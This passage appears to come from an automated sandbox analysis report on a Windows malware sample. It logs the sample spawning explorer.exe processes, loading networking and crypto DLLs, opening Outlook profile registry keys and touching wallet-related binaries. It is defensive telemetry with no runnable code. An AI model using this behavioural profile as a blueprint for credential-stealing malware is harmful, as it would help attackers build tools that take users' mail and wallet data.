                      Source: unknownProcess created: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe "C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\hfetwhc C:\Users\user\AppData\Roaming\hfetwhc
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\hfetwhc C:\Users\user\AppData\Roaming\hfetwhc
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hfetwhcSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Binary string: WalletProxy.pdbGCTL source: explorer.exe, 0000000D.00000003.2655011353.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2640399855.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657373914.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2685359398.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657226319.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2684711204.00000000052CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2702006220.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: walletservice.pdbGCTL source: explorer.exe, 0000000D.00000003.2570547209.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2664889234.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: WalletProxy.pdb source: explorer.exe, 0000000D.00000003.2655011353.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2640399855.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657373914.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2685359398.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657226319.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2684711204.00000000052CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2702006220.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: xy.pdb source: explorer.exe, 0000000D.00000003.2655011353.000000000523C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: WalletBackgroundServiceProxy.pdb source: explorer.exe, 0000000D.00000003.2700964728.000000000523C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2649083320.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2639119657.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2676572554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701582740.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701221963.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701414879.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2674928754.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2667473589.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2678065093.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2652375045.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.13.dr, WalletBackgroundServiceProxy.dll1.13.dr
                      Source: Binary string: WalletBackgroundServiceProxy.pdbGCTL source: explorer.exe, 0000000D.00000003.2649083320.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2639119657.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2676572554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701582740.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701221963.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701414879.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2674928754.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2667473589.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2678065093.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2652375045.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.13.dr, WalletBackgroundServiceProxy.dll1.13.dr
                      Source: Binary string: xy.pdbGCT.r source: explorer.exe, 0000000D.00000003.2655011353.000000000523C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: walletservice.pdb source: explorer.exe, 0000000D.00000003.2570547209.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2664889234.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: xy.pdbGCT.orp source: explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: WalletService.dll1.13.drStatic PE information: 0xACABE18A [Wed Oct 19 11:05:46 2061 UTC]
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00849247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,7_2_00849247
                      Source: Windows.ApplicationModel.Wallet.dll.13.drStatic PE information: section name: .didat
                      Source: WalletService.dll1.13.drStatic PE information: section name: .didat
